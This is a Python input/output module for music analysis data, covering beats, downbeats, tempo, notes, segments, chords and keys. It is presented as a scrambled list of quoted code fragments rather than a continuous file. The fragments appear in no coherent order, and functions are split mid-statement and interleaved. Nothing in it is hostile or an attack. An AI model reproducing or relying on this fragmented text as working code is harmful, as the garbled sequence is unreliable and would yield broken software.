lower tempo must be given first if mirex is not", "between tempi and strengths. `values` > `split_value` are interpreted as tempi [bpm], `values`", "version 0.16 ' 'and will be removed in version 0.17. Please sort the", "values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a", "must be positive') # no strength is given, assume an evenly distributed one", ": numpy array Array with the detected tempi (first column) and their strengths", ".audio import load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types", "of version 0.16 and will be ' 'removed in 0.18. Please sort the", ": str or file handle Output filename or handle. fmt : str or", "which case `delimiter` is ignored. delimiter : str, optional String or character separating", "position (e.g. seconds), 'end' the end position, and 'label' the segment label. \"\"\"", "first if mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated as", "instead of beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1)", "and additional columns are ignored, i.e. only the first column is returned. \"\"\"", "array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "Please sort the returned array ' 'separately.') # Note: use 'mergesort', because we", "str or file handle File to load the notes from. Returns ------- numpy", "mirex : bool, deprecated Report the lower tempo first (as required by MIREX).", "import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and will", "# return at most 'max_len' tempi and their relative strength if max_len is", "write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters", "t1 = tempi[0][0] strength = 1. # consider only the two strongest tempi", "of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in", "t1, 1. - strength # format as a numpy array and write to", "line events = np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the", "of the beats, they are filtered to contain only the downbeats (i.e. only", "be written to file. filename : str or file handle File to write", ": numpy array Beats or downbeats to be written to file. filename :", "format 'beat_time' ['beat_number']. Parameters ---------- filename : str or file handle File to", "interpreted as strengths. sort : bool, deprecated Sort the tempi by their strength.", "0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi,", "# try to load the data from file values = np.loadtxt(filename, ndmin=1) #", "File (handle) to open. mode: {'r', 'w'} Specifies the mode in which the", "file. filename : str or file handle File to write the events to.", "dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label return segments def", "Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\"", "= None # yield an open file handle yield f # close the", "1: if downbeats: # rows with a \"1\" in the 2nd column are", "handle File to read key information from. Returns ------- str Key. \"\"\" with", "must be given first if mirex is not None: import warnings warnings.warn('`mirex` argument", ": bool, deprecated Normalize the strengths to sum 1. max_len : int, deprecated", ": str or file handle File to load the beats from. downbeats :", "events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to", "'max_len' tempi and their relative strength if max_len is not None: import warnings", "Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array with tempi. If", "is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords", "'%.3f %.3f'), in which case `delimiter` is ignored. delimiter : str, optional String", "filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one", "utf-8 \"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function import io", "file. header : str, optional String that will be written at the beginning", "one event per line. Parameters ---------- events : numpy array Events to be", "shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str", "1. - strength # format as a numpy array and write to output", "keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] #", "import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will be", "Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file handle", "'mergesort', because we want a stable sorting algorithm # which keeps the order", "is the beat time, the rest is ignored return values[:, 0] return values", "form <start> <end> <label>, where <start> and <end> are floating point numbers, and", "is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename):", "sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file. Tempo information", "contextlib import numpy as np from .audio import load_audio_file from .midi import load_midi,", "file handle yield f # close the file if needed if fid: fid.close()", "sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f", "mode: {'r', 'w'} Specifies the mode in which the file is opened. Yields", "filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file, one event", "---------- filename : str or file handle File to load the beats from.", "filename : str or file handle File to load the events from. Returns", "as comment. mirex : bool, deprecated Report the lower tempo first (as required", "filename fid = None # yield an open file handle yield f #", "than tempi) if len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1. -", "sum(tempi[:2, 1]) # for MIREX, the lower tempo must be given first if", "the mode in which the file is opened. Yields ------ Open file (handle).", "array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename :", "are ignored, i.e. only the first column is returned. \"\"\" # read in", "one tempo was detected if len(tempi) == 1: t1 = tempi[0][0] strength =", "(-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi", "# which keeps the order of the keys in case of duplicate keys", "to a file. Parameters ---------- key : str Key name. filename : str", "t1, t2, strength = t2, t1, 1. - strength # format as a", "strengths if sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16 and", "name. filename : str or file handle Output file. header : str, optional", "will be written at the beginning of the file as comment. \"\"\" events", "beats : numpy array Beats to be written to file. filename : str", "----- If `beats` contains both time and number of the beats, they are", "handle. fmt : str or sequence of strs, optional A sequence of formats", "tempi with uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi", "the keys in case of duplicate keys # but we need to apply", "1-dimensional array of length 'num_tempi' is returned. If strengths are given, a 2D", "if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a text", "1] == 1][:, 0] else: # 1st column is the beat time, the", "downbeats: # rows with a \"1\" in the 2nd column are downbeats return", "fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events", "and the relative strength to a file. Parameters ---------- tempi : numpy array", "by their strength. norm_strengths : bool, deprecated Normalize the strengths to sum 1.", "file. Tempo information must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']]", "tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo must be", "filename : str or file handle File to write the beats to. fmt", "write header if header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING)))", "= load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key from the", "raise AssertionError('strengths must be positive') # no strength is given, assume an evenly", "'label' needs to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float),", "\"\"\" # try to load the data from file values = np.loadtxt(filename, ndmin=1)", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters ----------", "the file as comment. \"\"\" events = np.array(events) # reformat fmt to be", "given file, one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters", "the times of those beats with a beat number of 1). \"\"\" if", "str or file handle File to write the beats to. fmt : str", "load_segments(filename): \"\"\" Load labelled segments from file, one segment per line. Each segment", "and strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength =", "to file. filename : str or file handle File to write the events", "_io.open(filename, mode) else: f = filename fid = None # yield an open", "None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load", "load the downbeats from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True)", "File to read the labelled segments from. Returns ------- segments : numpy structured", "notes : numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration'", "and their relative strengths (second column) is returned. \"\"\" # try to load", "of duplicate keys # but we need to apply this '(-strengths)' trick because", "fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters ---------- beats", "file. Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes, row format", "str or sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%d',", "def load_segments(filename): \"\"\" Load labelled segments from file, one segment per line. Each", "beginning, end, and label of segments. \"\"\" start, end, label = [], [],", "data from file values = np.loadtxt(filename, ndmin=1) # split the filename according to", "\"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0] if", "one segment per line. Each segment is of form <start> <end> <label>, where", "array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\"", "= label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled", "norm_strengths : bool, deprecated Normalize the strengths to sum 1. max_len : int,", "sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16 and will be", "- len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths <", "file. Parameters ---------- beats : numpy array Beats to be written to file.", "not None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will", "handle File to load the events from. Returns ------- numpy array Events. Notes", "write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo", "= write_segments def load_key(filename): \"\"\" Load the key from the given file. Parameters", "tempo. strength : float Their relative strength. \"\"\" # make the given tempi", "----- Comments (lines starting with '#') and additional columns are ignored, i.e. only", "delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters ---------- segments :", "written at the beginning of the file as comment. mirex : bool, deprecated", "their filename into tempi and strengths # TODO: this is kind of hack-ish,", "at most `max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2])", "file as comment. \"\"\" events = np.array(events) # reformat fmt to be a", "Please sort the ' 'tempi manually') if t1 > t2: t1, t2, strength", "at the beginning of the file as comment. Returns ------- numpy structured array", "Parameters ---------- beats : numpy array Beats to be written to file. filename", "of 1). \"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:,", "length') # order the tempi according to their strengths if sort: import warnings", "single string if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write", "header) def load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters ----------", "\"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the", "have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename :", "the detected tempi (first column) and their strengths (second column). filename : str", "Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim >", "downbeats to a file. Parameters ---------- beats : numpy array Beats or downbeats", "def load_key(filename): \"\"\" Load the key from the given file. Parameters ---------- filename", "comment. Notes ----- If `beats` contains both time and number of the beats,", "load_key(filename): \"\"\" Load the key from the given file. Parameters ---------- filename :", "fmt : str or sequence of strs, optional A sequence of formats (e.g.", "string if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output", "A single format (e.g. '%.3f'), a sequence of formats, or a multi-format string", "'utf8' # dtype for numpy structured arrays that contain labelled segments # 'label'", "filtered to contain only the downbeats (i.e. only the times of those beats", "lower tempo first (as required by MIREX). Returns ------- tempo_1 : float The", "0.18. Please sort the returned array ' 'separately.') # Note: use 'mergesort', because", "\"\"\" # make the given tempi a 2d array tempi = np.array(tempi, ndmin=2)", "same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same", "= [('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in open() to", "with tempi (first column) and their relative strengths (second column) is returned. \"\"\"", "the file as comment. Returns ------- key : str Key name. \"\"\" write_events([key],", "= 'utf8' # dtype for numpy structured arrays that contain labelled segments #", "1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter,", "tempo_2 : float The second most dominant tempo. strength : float Their relative", "# 1st column is the event's time, the rest is ignored return events[:,", "a file. Parameters ---------- beats : numpy array Beats to be written to", "beats with a beat number of 1). \"\"\" if beats.ndim == 2: beats", "if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim", "of beats. Returns ------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if", "most dominant tempi and the relative strength to a file. Parameters ---------- tempi", "[] with open_file(filename) as f: for line in f: s, e, l =", "reformat fmt to be a single string if needed if isinstance(fmt, (list, tuple)):", "file as comment. \"\"\" if fmt is None and beats.ndim == 2: fmt", "contains the start position (e.g. seconds), 'end' the end position, and 'label' the", "Array with tempi. If no strength is parsed, a 1-dimensional array of length", "represented as numpy structured array with three named columns: 'start' contains the start", "of strs, optional A single format (e.g. '%.3f'), a sequence of formats (e.g.", "a 2D array with tempi (first column) and their relative strengths (second column)", "warnings warnings.warn('`sort` is deprecated as of version 0.16 and will be ' 'removed", "tempo_1 : float The most dominant tempo. tempo_2 : float The second most", "print_function import io as _io import contextlib import numpy as np from .audio", "of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f", "numpy array Beats to be written to file. filename : str or file", "division, print_function import io as _io import contextlib import numpy as np from", "io as _io import contextlib import numpy as np from .audio import load_audio_file", "is parsed, a 1-dimensional array of length 'num_tempi' is returned. If strengths are", "or file handle File to read the labelled segments from. Returns ------- segments", "arrays that contain labelled segments # 'label' needs to be castable to str", "_io import contextlib import numpy as np from .audio import load_audio_file from .midi", ": str or file handle File to write the notes to. fmt :", "or handle with the given mode and closes it if needed afterwards. Parameters", "from. Returns ------- str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def", "as f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to", "warnings.warn('`max_len` is deprecated as of version 0.16 and will be ' 'removed in", "== 1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise", "(handle). \"\"\" # check if we need to open the file if isinstance(filename,", "the tempi by their strength. norm_strengths : bool, deprecated Normalize the strengths to", "write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file, one", "multi-format string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter", "key information from. Returns ------- str Key. \"\"\" with open_file(filename) as f: return", "strength = t2, t1, 1. - strength # format as a numpy array", "Their relative strength. \"\"\" # make the given tempi a 2d array tempi", "import load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING", "Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename : str or", "columns: 'start' contains the start position (e.g. seconds), 'end' the end position, and", "given first if mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated", "Returns ------- str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key,", "line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file", "end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label']", "ndmin=1) # split the filename according to their filename into tempi and strengths", "of the file as comment. Returns ------- numpy structured array Labelled segments Notes", "'separately.') strengths /= float(strength_sum) # tempi and strengths must have same length if", "= np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows with a", "%d %.3f %d', in which case `delimiter` is ignored. delimiter : str, optional", "Input/output package. \"\"\" from __future__ import absolute_import, division, print_function import io as _io", "that contain labelled segments # 'label' needs to be castable to str SEGMENT_DTYPE", "header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given file, one", "the beginning of the file as comment. Notes ----- If `beats` contains both", "string_types): f = fid = _io.open(filename, mode) else: f = filename fid =", "Notes ----- Labelled segments are represented as numpy structured array with three named", "strengths. sort : bool, deprecated Sort the tempi by their strength. norm_strengths :", "fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters ---------- notes", "np.array(tempi, ndmin=2) # default values t1 = t2 = strength = np.nan #", "write the beats to. fmt : str or sequence of strs, optional A", "output with open_file(filename, 'wb') as f: # write header if header is not", "tempo. tempo_2 : float The second most dominant tempo. strength : float Their", "per line. Parameters ---------- filename : str or file handle File to load", "numpy structured array Structured array with columns 'start', 'end', and 'label', containing the", "the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str", "be ' 'removed in 0.18. Please sort the returned array ' 'separately.') #", "segments Notes ----- Labelled segments are represented as numpy structured array with three", "l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start", "\"\"\" events = np.array(events) # reformat fmt to be a single string if", "a numpy array and write to output out = np.array([t1, t2, strength], ndmin=2)", "mode in which the file is opened. Yields ------ Open file (handle). \"\"\"", "delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and the relative strength", "[], [] with open_file(filename) as f: for line in f: s, e, l", "= tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi and their", "labelled segments from. Returns ------- segments : numpy structured array Structured array with", "\"\"\" Write the downbeats to a file. Parameters ---------- beats : numpy array", "header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the key", "strengths = values[values <= split_value] # make the strengths behave properly strength_sum =", "'label', containing the beginning, end, and label of segments. \"\"\" start, end, label", "Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename,", "(e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter : str,", "# relative strengths are given (one less than tempi) if len(tempi) - len(strengths)", "---------- key : str Key name. filename : str or file handle Output", "the file as comment. Notes ----- If `beats` contains both time and number", "@suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file, one", "point numbers, and <label> is a string. Parameters ---------- filename : str or", "file handle File to write the notes to. fmt : str or sequence", "given, assume an evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi)", "multi-format string (e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter :", "TODO: this is kind of hack-ish, find a better solution tempi = values[values", "strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must", "file handle Output file. header : str, optional String that will be written", "header : str, optional String that will be written at the beginning of", "return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to", "we want a stable sorting algorithm # which keeps the order of the", "1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1])", "format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format", "ndmin=2) # 1st column is the event's time, the rest is ignored return", "tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array with tempi.", "(i.e. only the times of those beats with a beat number of 1).", "sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']),", "the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as", "strength = 1. # consider only the two strongest tempi and strengths elif", "1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo must be given", "filename into tempi and strengths # TODO: this is kind of hack-ish, find", "Return at most `max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[,", "tempi : numpy array, shape (num_tempi[, 2]) Array with tempi. If no strength", "' 'will be removed in 0.18. Please normalize strengths ' 'separately.') strengths /=", "downbeats : bool, optional Load only downbeats instead of beats. Returns ------- numpy", "in the 2nd column are downbeats return values[values[:, 1] == 1][:, 0] else:", "0.16 and ' 'will be removed in 0.18. Please normalize strengths ' 'separately.')", "have same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have", "handle File to load the downbeats from. Returns ------- numpy array Downbeats. \"\"\"", "Output filename or handle. fmt : str or sequence of strs, optional A", "Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None):", "raise ValueError('unknown format for `notes`') # truncate format to the number of colums", "segments from. Returns ------- segments : numpy structured array Structured array with columns", "Key name. filename : str or file handle Output file. header : str,", "delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given file,", "'removed in 0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T", "to open. mode: {'r', 'w'} Specifies the mode in which the file is", "try: string = fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError:", "delimiter : str, optional String or character separating columns. header : str, optional", "# tempi with uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort')", "beginning of the file as comment. mirex : bool, deprecated Report the lower", "fmt = ['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename,", "filename : str or file handle Output file. header : str, optional String", "of strs, optional A single format (e.g. '%.3f'), a sequence of formats, or", "['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which case `delimiter`", "def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file, one beat", "with tempi. If no strength is parsed, a 1-dimensional array of length 'num_tempi'", "If no strength is parsed, a 1-dimensional array of length 'num_tempi' is returned.", "Specifies the mode in which the file is opened. Yields ------ Open file", "tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi and", "float Their relative strength. \"\"\" # make the given tempi a 2d array", "file (handle). \"\"\" # check if we need to open the file if", "the tempi according to their strengths if sort: import warnings warnings.warn('`sort` is deprecated", "load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING =", "to their strengths if sort: import warnings warnings.warn('`sort` is deprecated as of version", "filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the", "the beats, they are filtered to contain only the downbeats (i.e. only the", "def load_events(filename): \"\"\" Load a events from a text file, one floating point", "1st column is the beat time, the rest is ignored return values[:, 0]", ": str, optional String or character separating columns. header : str, optional String", "object)] # overwrite the built-in open() to transparently apply some magic file handling", "and strengths. `values` > `split_value` are interpreted as tempi [bpm], `values` <= `split_value`", "['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f %d',", "write events for e in events: try: string = fmt % tuple(e.tolist()) except", "# for MIREX, the lower tempo must be given first if mirex is", "= filename fid = None # yield an open file handle yield f", "open file or handle with the given mode and closes it if needed", "f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE)", "the downbeats (i.e. only the times of those beats with a beat number", "2]) Array with tempi. If no strength is parsed, a 1-dimensional array of", "given tempi a 2d array tempi = np.array(tempi, ndmin=2) # default values t1", "and label of segments. \"\"\" start, end, label = [], [], [] with", "delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters ---------- beats :", "the order of the keys in case of duplicate keys # but we", "from the given file. Tempo information must have the following format: 'main tempo'", "uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx]", ": numpy structured array Structured array with columns 'start', 'end', and 'label', containing", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters ----------", "Load the key from the given file. Parameters ---------- filename : str or", "# close the file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\"", "t1, t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) #", "/ float(len(tempi)) # normalize the strengths if norm_strengths is not None: import warnings", "deprecated as of version 0.16 ' 'and will be removed in version 0.17.", "a events from a text file, one floating point number per line. Parameters", "fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError: string = fmt", "have same length') # order the tempi according to their strengths if sort:", "containing the beginning, end, and label of segments. \"\"\" start, end, label =", "strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of", "ignored. delimiter : str, optional String or character separating columns. header : str,", "that will be written at the beginning of the file as comment. mirex", "not notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate format to", "A single format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or", "numpy array Beats or downbeats to be written to file. filename : str", "events for e in events: try: string = fmt % tuple(e.tolist()) except AttributeError:", "stable sorting algorithm # which keeps the order of the keys in case", "Each segment is of form <start> <end> <label>, where <start> and <end> are", "they are filtered to contain only the downbeats (i.e. only the times of", "strengths must have same length') # order the tempi according to their strengths", "array with columns 'start', 'end', and 'label', containing the beginning, end, and label", "following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or", "first column is returned. \"\"\" # read in the events, one per line", "= np.array(tempi, ndmin=2) # default values t1 = t2 = strength = np.nan", "written at the beginning of the file as comment. \"\"\" if fmt is", "row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file handle File", "numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if", "strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if", "string (e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter : str,", "of the file as comment. Notes ----- If `beats` contains both time and", "Parameters ---------- filename : str or file handle File to load the events", "---------- beats : numpy array Beats or downbeats to be written to file.", "if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths", "file values = np.loadtxt(filename, ndmin=1) # split the filename according to their filename", "start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end", "filename : str or file handle File to write the events to. fmt", "f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename,", "Returns ------- numpy array Notes. \"\"\" # set default format if fmt is", "\"\"\" from __future__ import absolute_import, division, print_function import io as _io import contextlib", "segments['end'] = end segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t',", "tempo' ['relative_strength']] Parameters ---------- filename : str or file handle File to load", "as of version 0.16 and will be ' 'removed in 0.18. Please truncate", "line. Parameters ---------- events : numpy array Events to be written to file.", "events to. fmt : str or sequence of strs, optional A single format", "the given file. Parameters ---------- filename : str or file handle File to", "or file handle File to write the beats to. fmt : str or", "starting with '#') and additional columns are ignored, i.e. only the first column", "handle Output file. delimiter : str, optional String or character separating columns. header", "column are downbeats return values[values[:, 1] == 1][:, 0] else: # 1st column", "= start segments['end'] = end segments['label'] = label return segments def write_segments(segments, filename,", ": int, deprecated Return at most `max_len` tempi. Returns ------- tempi : numpy", "which the file is opened. Yields ------ Open file (handle). \"\"\" # check", "to load the data from file values = np.loadtxt(filename, ndmin=1) # split the", "'%d']), or a multi-format string, e.g. '%.3f %d %.3f %d', in which case", "default values t1 = t2 = strength = np.nan # only one tempo", "None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will", "tempi and strengths # TODO: this is kind of hack-ish, find a better", "start position (e.g. seconds), 'end' the end position, and 'label' the segment label.", "---------- filename : str or file handle File to read key information from.", "to read key information from. Returns ------- str Key. \"\"\" with open_file(filename) as", "string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets", "rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\"", "------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t',", "is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for", "output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'], delimiter=delimiter,", "# read in the events, one per line events = np.loadtxt(filename, ndmin=2) #", "['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format for", "= beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt = '%.3f'", "np.loadtxt(filename, ndmin=1) # split the filename according to their filename into tempi and", "(handle) to open. mode: {'r', 'w'} Specifies the mode in which the file", "float The most dominant tempo. tempo_2 : float The second most dominant tempo.", "a file. Parameters ---------- beats : numpy array Beats or downbeats to be", "file if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f =", "%d', in which case `delimiter` is ignored. delimiter : str, optional String or", "delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load the", "will be written at the beginning of the file as comment. Notes -----", "= np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label return", "beat per line of format 'beat_time' ['beat_number']. Parameters ---------- filename : str or", "> split_value] strengths = values[values <= split_value] # make the strengths behave properly", "only the times of those beats with a beat number of 1). \"\"\"", "if len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum) if", "array, shape (num_tempi[, 2]) Array with tempi. If no strength is parsed, a", "length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must have same length')", "A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string,", "of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt,", "1][:, 0] else: # 1st column is the beat time, the rest is", "array tempi = np.array(tempi, ndmin=2) # default values t1 = t2 = strength", "str or file handle File (handle) to open. mode: {'r', 'w'} Specifies the", "no strength is parsed, a 1-dimensional array of length 'num_tempi' is returned. If", "= _io.open(filename, mode) else: f = filename fid = None # yield an", "tuple(e.tolist()) except AttributeError: string = e except TypeError: string = fmt % e", "file as comment. Notes ----- If `beats` contains both time and number of", "the most dominant tempi and the relative strength to a file. Parameters ----------", "if np.any(strengths < 0): raise AssertionError('strengths must be positive') # no strength is", "tempi according to their strengths if sort: import warnings warnings.warn('`sort` is deprecated as", "\"\"\" Context manager which yields an open file or handle with the given", "must have same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths must", "the given file, one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']].", "be a single string if needed if 